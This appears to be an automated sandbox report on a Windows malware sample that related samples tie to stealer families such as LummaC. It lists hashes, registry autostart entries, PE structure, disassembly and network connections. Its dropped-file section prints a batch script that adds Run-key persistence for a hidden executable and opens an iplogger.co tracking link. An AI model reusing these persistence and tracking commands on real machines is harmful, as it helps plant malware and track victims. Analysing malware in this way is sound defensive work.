                                  • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com
                                  • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • VT rate limit hit for: file.exe
                                  TimeTypeDescription
                                  11:47:02AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\dileapp.exe
                                  11:47:10AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\dileapp.exe
                                  11:47:18AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\dileapp.exe
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  239.255.255.250file.exeGet hashmaliciousLummaC StealerBrowse
                                    file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                      file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                            file.exeGet hashmaliciousVidarBrowse
                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                  file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                      104.21.82.93file.exeGet hashmaliciousLummaC StealerBrowse
                                                        cmd.exeGet hashmaliciousUnknownBrowse
                                                          newvideozones.click.ps1Get hashmaliciousLummaCBrowse
                                                            newvideozones.click.ps1Get hashmaliciousUnknownBrowse
                                                              pub-9c4ec7f3f95c448b85e464d2b533aac1.r2.dev.ps1Get hashmaliciousLummaCBrowse
                                                                encrypter-windows-x86.exeGet hashmaliciousUnknownBrowse
                                                                  yWny5Jds8b.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLineBrowse
                                                                    https://prezi.com/i/view/0dF0780HKO9RqC8umFaJGet hashmaliciousUnknownBrowse
                                                                      172.67.167.249file.exeGet hashmaliciousLummaC StealerBrowse
                                                                        sus.ps1Get hashmaliciousLummaCBrowse
                                                                          ofsetvideofre.click.ps1Get hashmaliciousLummaCBrowse
                                                                            4h1Zc12ZBe.exeGet hashmaliciousStealcBrowse
                                                                              dlcdkJcbbV.exeGet hashmaliciousLummaC, RedLineBrowse
                                                                                1Vkf7silOj.exeGet hashmaliciousLummaC, Amadey, Mars Stealer, PureLog Stealer, RedLine, SmokeLoader, StealcBrowse
                                                                                  hsRju5CPK2.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                                                                    https://prezi.com/i/view/0dF0780HKO9RqC8umFaJGet hashmaliciousUnknownBrowse
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      iplogger.cofile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.67.167.249
                                                                                      sus.ps1Get hashmaliciousLummaCBrowse
                                                                                      • 172.67.167.249
                                                                                      cW5i0RdQ4L.exeGet hashmaliciousUnknownBrowse
                                                                                      • 104.21.76.57
                                                                                      cW5i0RdQ4L.exeGet hashmaliciousUnknownBrowse
                                                                                      • 104.21.76.57
                                                                                      Activator by URKE v2.5.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.188.178
                                                                                      SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeGet hashmaliciousUnknownBrowse
                                                                                      • 104.21.76.57
                                                                                      file.exeGet hashmaliciousDarkTortilla, PureLog StealerBrowse
                                                                                      • 104.21.76.57
                                                                                      file.exeGet hashmaliciousDarkTortillaBrowse
                                                                                      • 104.21.76.57
                                                                                      cmd.exeGet hashmaliciousUnknownBrowse
                                                                                      • 104.21.82.93
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.67.165.166
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.67.165.166
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 104.21.16.9
                                                                                      file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                      • 172.67.165.166
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 104.21.16.9
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 104.21.16.9
                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                                                                                      • 172.67.165.166
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 104.21.16.9
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.67.165.166
                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                      • 104.21.16.9
                                                                                      CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.67.165.166
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.67.165.166
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 104.21.16.9
                                                                                      file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                      • 172.67.165.166
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 104.21.16.9
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 104.21.16.9
                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                                                                                      • 172.67.165.166
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 104.21.16.9
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.67.165.166
                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                      • 104.21.16.9
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      28a2c9bd18a11de089ef85a160da29e4file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.202.163.200
                                                                                      • 13.107.246.63
                                                                                      • 23.218.208.109
                                                                                      • 20.12.23.50
                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                      • 172.202.163.200
                                                                                      • 13.107.246.63
                                                                                      • 23.218.208.109
                                                                                      • 20.12.23.50
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.202.163.200
                                                                                      • 13.107.246.63
                                                                                      • 23.218.208.109
                                                                                      • 20.12.23.50
                                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                                      • 172.202.163.200
                                                                                      • 13.107.246.63
                                                                                      • 23.218.208.109
                                                                                      • 20.12.23.50
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.202.163.200
                                                                                      • 13.107.246.63
                                                                                      • 23.218.208.109
                                                                                      • 20.12.23.50
                                                                                      file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                      • 172.202.163.200
                                                                                      • 13.107.246.63
                                                                                      • 23.218.208.109
                                                                                      • 20.12.23.50
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.202.163.200
                                                                                      • 13.107.246.63
                                                                                      • 23.218.208.109
                                                                                      • 20.12.23.50
                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                      • 172.202.163.200
                                                                                      • 13.107.246.63
                                                                                      • 23.218.208.109
                                                                                      • 20.12.23.50
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.202.163.200
                                                                                      • 13.107.246.63
                                                                                      • 23.218.208.109
                                                                                      • 20.12.23.50
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.202.163.200
                                                                                      • 13.107.246.63
                                                                                      • 23.218.208.109
                                                                                      • 20.12.23.50
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      C:\Users\Public\Netstat\dileapp\SourceMod_Setup.exefile.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):14833664
                                                                                        Entropy (8bit):6.4046623433494805
                                                                                        Encrypted:false
                                                                                        SSDEEP:98304:gZs/pFGCjU0MZsGgLvqPzz3dcaVAU5DL/Pu7KB7biH/4CM39r/GsIsS6qUr1UrEM:jPM085dcamCfgKBsIPSSBILdnZp
                                                                                        MD5:3475C7D37C7995451275305684114989
                                                                                        SHA1:648098615CA3A981FF8154063EE78F95359A7769
                                                                                        SHA-256:7B029D45FDAB9E8FEEE93E443B9B179C6D4010810BA2DDE3F2611BF24A7F09A4
                                                                                        SHA-512:5154D0B550B5DF31EA070E8000A50C970BF13020DD2A133E5648AAC60C9958ED4F3A2EA8D6AD0E1F513E94B6352DDA269FD27044ABA33BB6CE88F6FE17F547AF
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        Reputation:low
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........................i..................@....@..........................p............@..................................`...........e...................p..Bv..................................................._...............................text...5.i.......i................. ..`.rdata..T.l..0i...l...i.............@..@.data...l....@...X..................@....idata.......`.......t..............@....reloc..Bv...p...x...x..............@..B.symtab................................B.rsrc....e.......f..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):347
                                                                                        Entropy (8bit):5.241342430352341
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:hwszH1j0KpIAgidquHxEDscfoZH1j0KpIAgidquHxEDsWEEDwTGQCCAP+YOA:HVj0KprgidquS+Vj0KprgidquqSqXCQ9
                                                                                        MD5:C27142AA5D9C13E25E9335A57A952743
                                                                                        SHA1:725EED87891582F0D5BC1622F5A84CB5B77E2495
                                                                                        SHA-256:C5A6FC64F2EBF5C1FD0E39E4AE37D53FEA01A6758A74B1544D2D475A97DD09AD
                                                                                        SHA-512:43FC9B010ED3CD9F7ADD8E774613492355E41D08FD9E2790AFD0CF9ED08133BE74BDC543C5D6820CE4B68898D07407EC5CF090DBD75180255A4763A3C730BE42
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:@echo off..REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\dileapp.exe"..REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\dileapp.exe"..start %Public%\Netstat\dileapp.exe..@echo off..start "" "https://iplogger.co/1tJFB4"..exit..
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):2833
                                                                                        Entropy (8bit):7.876846206921263
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:Kw15hc/Pj2itdgjeVVO/SzBdCvhaHAlJX7XnF/HDoSH8T78atjZeHMBx/F/WssM:J15hc/Pj2mdgjMjusgl5XFD3MoIx9eg
                                                                                        MD5:18C023BC439B446F91BF942270882422
                                                                                        SHA1:768D59E3085976DBA252232A65A4AF562675F782
                                                                                        SHA-256:E0E71ACEF1EFBFAB69A1A60CD8FADDED948D0E47A0A27C59A0BE7033F6A84482
                                                                                        SHA-512:A95AD7B48596BC0AF23D05D1E58681E5D65E707247F96C5BC088880F4525312A1834A89615A0E33AEA6B066793088A193EC29B5C96EA216F531C443487AE0735
                                                                                        Malicious:false
                                                                                        URL:https://iplogger.co/favicon.ico
                                                                                        Preview:.PNG........IHDR...@...@......iq.....IDATx.....e.._Osm...,uY.sYI.w.$..........:VjD..!...o%....5$......... (..;~8."......h...r.^/}...|..qm.O.w..I.m....>..y>.?_.....;_=.b.R4X..4.2....S!.P.m>......*`........@.....O...\,...o..@..RS.5.3.....M..@.....>..|....2p ......v...-a.9........V..0.X....`(.....TH.i....o:.....'p3.[.Lx.q.1.....XN/j.M...y..+....!r.P........F.6....M.W./".QK.....?...r....f.7.?...7..y@..-` ......f.7..x.......z-......u6D...M.=.6D....`X..>.......`....?..-....s..\..._...Vc.&......rzM...9B....dJp.......|....@..O....."je...oGL..1.......R!5\.Q.7.......Mb.x.x....)E.u.b9.Ad.<..x.8.L!...8...aV#..|>.R...9+.....P......~..^...;?.#q......d.G.a`..I...c9..\..Cc',.l.-.......m.H..E......s.s...:.l>....L....u...g#Q..0.<...3.~=b.....TH.....M......K..a..R48....W.[..6...?...3.)..r.WHd8...o(.^.....]..~.8ef49..F......d.QF.zg).,.#.E.-..q..L.....^.u.x.XY....,.......C.i=lJ..c.?.4E=@......Y.r...`......Z.8].....A../.R...5.-.YG1...b.....y..x.".'Y...b1.....K..$..">..
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):2833
                                                                                        Entropy (8bit):7.876846206921263
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:Kw15hc/Pj2itdgjeVVO/SzBdCvhaHAlJX7XnF/HDoSH8T78atjZeHMBx/F/WssM:J15hc/Pj2mdgjMjusgl5XFD3MoIx9eg
                                                                                        MD5:18C023BC439B446F91BF942270882422
                                                                                        SHA1:768D59E3085976DBA252232A65A4AF562675F782
                                                                                        SHA-256:E0E71ACEF1EFBFAB69A1A60CD8FADDED948D0E47A0A27C59A0BE7033F6A84482
                                                                                        SHA-512:A95AD7B48596BC0AF23D05D1E58681E5D65E707247F96C5BC088880F4525312A1834A89615A0E33AEA6B066793088A193EC29B5C96EA216F531C443487AE0735
                                                                                        Malicious:false
                                                                                        Preview:.PNG........IHDR...@...@......iq.....IDATx.....e.._Osm...,uY.sYI.w.$..........:VjD..!...o%....5$......... (..;~8."......h...r.^/}...|..qm.O.w..I.m....>..y>.?_.....;_=.b.R4X..4.2....S!.P.m>......*`........@.....O...\,...o..@..RS.5.3.....M..@.....>..|....2p ......v...-a.9........V..0.X....`(.....TH.i....o:.....'p3.[.Lx.q.1.....XN/j.M...y..+....!r.P........F.6....M.W./".QK.....?...r....f.7.?...7..y@..-` ......f.7..x.......z-......u6D...M.=.6D....`X..>.......`....?..-....s..\..._...Vc.&......rzM...9B....dJp.......|....@..O....."je...oGL..1.......R!5\.Q.7.......Mb.x.x....)E.u.b9.Ad.<..x.8.L!...8...aV#..|>.R...9+.....P......~..^...;?.#q......d.G.a`..I...c9..\..Cc',.l.-.......m.H..E......s.s...:.l>....L....u...g#Q..0.<...3.~=b.....TH.....M......K..a..R48....W.[..6...?...3.)..r.WHd8...o(.^.....]..~.8ef49..F......d.QF.zg).,.#.E.-..q..L.....^.u.x.XY....,.......C.i=lJ..c.?.4E=@......Y.r...`......Z.8].....A../.R...5.-.YG1...b.....y..x.".'Y...b1.....K..$..">..
                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Entropy (8bit):7.985086875325514
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:file.exe
                                                                                        File size:4'963'581 bytes
                                                                                        MD5:b9657f229c7591f44dbef1bfb5c2be01
                                                                                        SHA1:75698067fa4151e5f980035c9e4e528fb07fa1e3
                                                                                        SHA256:6833761d646963c16bba26bce95782d216d9450e1cce16c2560e49ffa7f95f7a
                                                                                        SHA512:26bbed1c31005dada42bead2f8211755af39907dbe261cb9f19848c5038ebbd8432f2b0de07a5262c4780e0e4d0cba3df3cdb1555b4c2058784e8bacf5301287
                                                                                        SSDEEP:98304:VIJBJTkxRI3MsZZhkZA7phtcK37nAT9fnJKqTAAgaVKLmnls:VwkvCFZeW7phtck7u/Kqyfals
                                                                                        TLSH:07363342BAC3D4F1E9360D32522A9F511F7D7E203F1265FFA3503A5DD528162A238EDA
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~..............b.......b..<....b......)^...................................................... ....... .......%....... ......
                                                                                        Icon Hash:1515d4d4442f2d2d
                                                                                        Entrypoint:0x41d779
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x5C72EA7E [Sun Feb 24 19:03:26 2019 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:5
                                                                                        OS Version Minor:1
                                                                                        File Version Major:5
                                                                                        File Version Minor:1
                                                                                        Subsystem Version Major:5
                                                                                        Subsystem Version Minor:1
                                                                                        Import Hash:00be6e6c4f9e287672c8301b72bdabf3
                                                                                        Instruction
                                                                                        call 00007FF52087BCDFh
                                                                                        jmp 00007FF52087B6D3h
                                                                                        cmp ecx, dword ptr [0043A1C8h]
                                                                                        jne 00007FF52087B845h
                                                                                        ret
                                                                                        jmp 00007FF52087BE56h
                                                                                        and dword ptr [ecx+04h], 00000000h
                                                                                        mov eax, ecx
                                                                                        and dword ptr [ecx+08h], 00000000h
                                                                                        mov dword ptr [ecx+04h], 00430FE8h
                                                                                        mov dword ptr [ecx], 00431994h
                                                                                        ret
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        push esi
                                                                                        push dword ptr [ebp+08h]
                                                                                        mov esi, ecx
                                                                                        call 00007FF52086EDDDh
                                                                                        mov dword ptr [esi], 004319A0h
                                                                                        mov eax, esi
                                                                                        pop esi
                                                                                        pop ebp
                                                                                        retn 0004h
                                                                                        and dword ptr [ecx+04h], 00000000h
                                                                                        mov eax, ecx
                                                                                        and dword ptr [ecx+08h], 00000000h
                                                                                        mov dword ptr [ecx+04h], 004319A8h
                                                                                        mov dword ptr [ecx], 004319A0h
                                                                                        ret
                                                                                        lea eax, dword ptr [ecx+04h]
                                                                                        mov dword ptr [ecx], 00431988h
                                                                                        push eax
                                                                                        call 00007FF52087E9EEh
                                                                                        pop ecx
                                                                                        ret
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        push esi
                                                                                        mov esi, ecx
                                                                                        lea eax, dword ptr [esi+04h]
                                                                                        mov dword ptr [esi], 00431988h
                                                                                        push eax
                                                                                        call 00007FF52087E9D7h
                                                                                        test byte ptr [ebp+08h], 00000001h
                                                                                        pop ecx
                                                                                        je 00007FF52087B84Ch
                                                                                        push 0000000Ch
                                                                                        push esi
                                                                                        call 00007FF52087AE12h
                                                                                        pop ecx
                                                                                        pop ecx
                                                                                        mov eax, esi
                                                                                        pop esi
                                                                                        pop ebp
                                                                                        retn 0004h
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        sub esp, 0Ch
                                                                                        lea ecx, dword ptr [ebp-0Ch]
                                                                                        call 00007FF52087B7AEh
                                                                                        push 00437B58h
                                                                                        lea eax, dword ptr [ebp-0Ch]
                                                                                        push eax
                                                                                        call 00007FF52087E0D6h
                                                                                        int3
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        sub esp, 0Ch
                                                                                        Programming Language:
                                                                                        • [ C ] VS2008 SP1 build 30729
                                                                                        • [IMP] VS2008 SP1 build 30729
                                                                                        • [C++] VS2015 UPD3.1 build 24215
                                                                                        • [EXP] VS2015 UPD3.1 build 24215
                                                                                        • [RES] VS2015 UPD3 build 24213
                                                                                        • [LNK] VS2015 UPD3.1 build 24215
                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x38cd00x34.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x38d040x3c.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x5d0000xe034.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x6c0000x1fd0.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x36ee00x54.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x319280x40.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x300000x25c.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x382540x120.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x10000x2e8640x2ea008c2dd3ebce78edeed565107466ae1d3eFalse0.5908595844504021data6.693477406609911IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rdata0x300000x9aac0x9c00b8d3a709e8e2861298e51f270be0f883False0.45718149038461536data5.133828516884417IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .data0x3a0000x213d00xc007a066b052b7178cd1388c71d17dec570False0.2789713541666667data3.2428863859698565IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .gfids0x5c0000xe80x2000a8129f1f5d2e8ddcb61343ecd6f891aFalse0.33984375data2.0959167744603624IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .rsrc0x5d0000xe0340xe2000c300f4f350c5eb1b8807504b5028be7False0.6342643805309734data6.802552664276539IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc0x6c0000x1fd00x2000983e78af74da826d9233ebaa3055869aFalse0.8060302734375data6.687357530503152IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        PNG0x5d6440xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced1.0027729636048528
                                                                                        PNG0x5e18c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced0.9363390441839495
                                                                                        RT_ICON0x5f7380x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors0.47832369942196534
                                                                                        RT_ICON0x5fca00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors0.5410649819494585
                                                                                        RT_ICON0x605480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors0.4933368869936034
                                                                                        RT_ICON0x613f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m0.5390070921985816
                                                                                        RT_ICON0x618580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m0.41393058161350843
                                                                                        RT_ICON0x629000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m0.3479253112033195
                                                                                        RT_ICON0x64ea80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9809269502193401
                                                                                        RT_DIALOG0x68c1c0x2a2data0.5296735905044511
                                                                                        RT_DIALOG0x68ec00x13adata0.6624203821656051
                                                                                        RT_DIALOG0x68ffc0xf2data0.71900826446281
                                                                                        RT_DIALOG0x690f00x14edata0.5868263473053892
                                                                                        RT_DIALOG0x692400x318data0.476010101010101
                                                                                        RT_DIALOG0x695580x24adata0.6262798634812287
                                                                                        RT_STRING0x697a40x1fcdata0.421259842519685
                                                                                        RT_STRING0x699a00x246data0.41924398625429554
                                                                                        RT_STRING0x69be80x1dcdata0.5105042016806722
                                                                                        RT_STRING0x69dc40xdcdata0.65
                                                                                        RT_STRING0x69ea00x468data0.375
                                                                                        RT_STRING0x6a3080x164data0.5056179775280899
                                                                                        RT_STRING0x6a46c0xe4data0.6359649122807017
                                                                                        RT_STRING0x6a5500x158data0.4563953488372093
                                                                                        RT_STRING0x6a6a80xe8data0.5948275862068966
                                                                                        RT_STRING0x6a7900xe6data0.5695652173913044
                                                                                        RT_GROUP_ICON0x6a8780x68data0.7019230769230769
                                                                                        RT_MANIFEST0x6a8e00x753XML 1.0 document, ASCII text, with CRLF line terminators0.39786666666666665
                                                                                        DLLImport
                                                                                        KERNEL32.dllGetLastError, SetLastError, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, GetTickCount, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                                                                                        gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Nov 30, 2024 12:47:07.192233086 CET49735443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:07.192234993 CET49736443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:07.192246914 CET44349735104.21.82.93192.168.2.4
